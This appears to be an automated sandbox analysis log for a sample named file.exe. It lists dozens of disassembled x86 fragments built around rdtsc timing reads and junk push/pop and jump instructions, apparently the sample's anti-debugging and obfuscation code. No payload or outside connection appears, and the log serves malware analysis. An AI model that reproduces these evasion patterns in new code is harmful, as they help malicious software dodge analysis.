Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B764E8 second address: B76516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FF624C752FEh 0x0000000d push ecx 0x0000000e jnl 00007FF624C752F6h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007FF624C75301h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76516 second address: B76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007FF624B4E7E0h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76529 second address: B76537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76537 second address: B7653C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7670E second address: B76712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76712 second address: B76716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7686A second address: B76870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7710E second address: B77114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77114 second address: B77122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77122 second address: B77191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF624B4E7D8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jno 00007FF624B4E7DCh 0x00000028 lea eax, dword ptr [ebp+1247AB23h] 0x0000002e jmp 00007FF624B4E7DDh 0x00000033 nop 0x00000034 push ebx 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b jp 00007FF624B4E7DEh 0x00000041 nop 0x00000042 mov cx, EEE3h 0x00000046 lea eax, dword ptr [ebp+1247AADFh] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77191 second address: B77195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77195 second address: B7719B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7719B second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF624C752FAh 0x00000011 nop 0x00000012 mov edx, edi 0x00000014 call dword ptr [ebp+122D28B2h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624C752FBh 0x00000021 jne 00007FF624C752FCh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2BB4A second address: B2BB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2BB54 second address: B2BB66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF624C752FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B69 second address: BB6B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B71 second address: BB6B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B75 second address: BB6B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6E86 second address: BB6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6FEF second address: BB700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB700C second address: BB7010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7010 second address: BB7016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7016 second address: BB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF624C75302h 0x0000000c jng 00007FF624C752F6h 0x00000012 je 00007FF624C752F6h 0x00000018 ja 00007FF624C752F8h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB703B second address: BB7063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624B4E7E8h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7063 second address: BB706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB706C second address: BB7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7076 second address: BB707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB707A second address: BB7083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B616B8 second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBAB5 second address: BBBAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBAC0 second address: BBBACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBC23 second address: BBBC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBC2A second address: BBBC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC016 second address: BBC01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC01C second address: BBC020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC020 second address: BBC02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC1A0 second address: BBC1A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC1A8 second address: BBC1B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF624B4E7D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC5DA second address: BBC5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBF6B2 second address: BBF6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBF6B6 second address: BBF6C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0DCB second address: BC0E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624B4E7E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FF624B4E7E6h 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FF624B4E7DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0E07 second address: BC0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0E0B second address: BC0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3E49F second address: B3E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC38ED second address: BC38FA instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC38FA second address: BC3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8490 second address: BC8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8499 second address: BC84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC84B4 second address: BC84B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC860A second address: BC8610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8610 second address: BC8618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8618 second address: BC861D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC861D second address: BC8622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC878A second address: BC8797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8797 second address: BC87B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FF624B4E7D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC87B9 second address: BC87C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC894A second address: BC8968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FF624B4E7FDh 0x0000000b pushad 0x0000000c jmp 00007FF624B4E7DEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8AEF second address: BC8B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624C75309h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8B23 second address: BC8B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE978 second address: BCE986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624C752F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD482 second address: BCD4AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF624B4E7DCh 0x0000000f jbe 00007FF624B4E7D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4AB second address: BCD4D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C752FCh 0x00000008 jmp 00007FF624C75304h 0x0000000d popad 0x0000000e js 00007FF624C752FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4D7 second address: BCD4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF624B4E7FBh 0x0000000e pushad 0x0000000f jmp 00007FF624B4E7E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD4FB second address: BCD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD7B0 second address: BCD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD7B6 second address: BCD7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD94C second address: BCD951 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD951 second address: BCD968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCD968 second address: BCD9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF624B4E808h 0x0000000e push edx 0x0000000f jnp 00007FF624B4E7D6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jmp 00007FF624B4E7E8h 0x0000001c jmp 00007FF624B4E7DAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDACB second address: BCDADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF624C752F6h 0x00000008 jns 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDADB second address: BCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF624B4E7DCh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDC63 second address: BCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF624C75307h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCDC84 second address: BCDC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE68D second address: BCE691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E7F second address: BD0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E86 second address: BD0E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E8C second address: BD0E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FF89 second address: B3FF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD740D second address: BD743A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b ja 00007FF624B4E7D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FF624B4E7DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FF624B4E7D6h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD743A second address: BD7440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7598 second address: BD759C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD759C second address: BD75A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75A2 second address: BD75AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007FF624B4E7D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75AF second address: BD75CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75300h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF624C752F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75CC second address: BD75FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624B4E7D6h 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FF624B4E7DCh 0x00000019 je 00007FF624B4E7D6h 0x0000001f jc 00007FF624B4E7DEh 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75FB second address: BD75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD75FF second address: BD7606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7E46 second address: BD7E52 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624C752F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD7E52 second address: BD7E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FF624B4E7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnl 00007FF624B4E7EAh 0x00000014 jmp 00007FF624B4E7E4h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD890C second address: BD895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF624C75303h 0x0000000d jmp 00007FF624C752FAh 0x00000012 push eax 0x00000013 jmp 00007FF624C75305h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624C75302h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8C20 second address: BD8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8C26 second address: BD8C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e jp 00007FF624C752F6h 0x00000014 jbe 00007FF624C752F6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jnc 00007FF624C752F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE105D second address: BE1068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE01DB second address: BE01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05A3 second address: BE05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
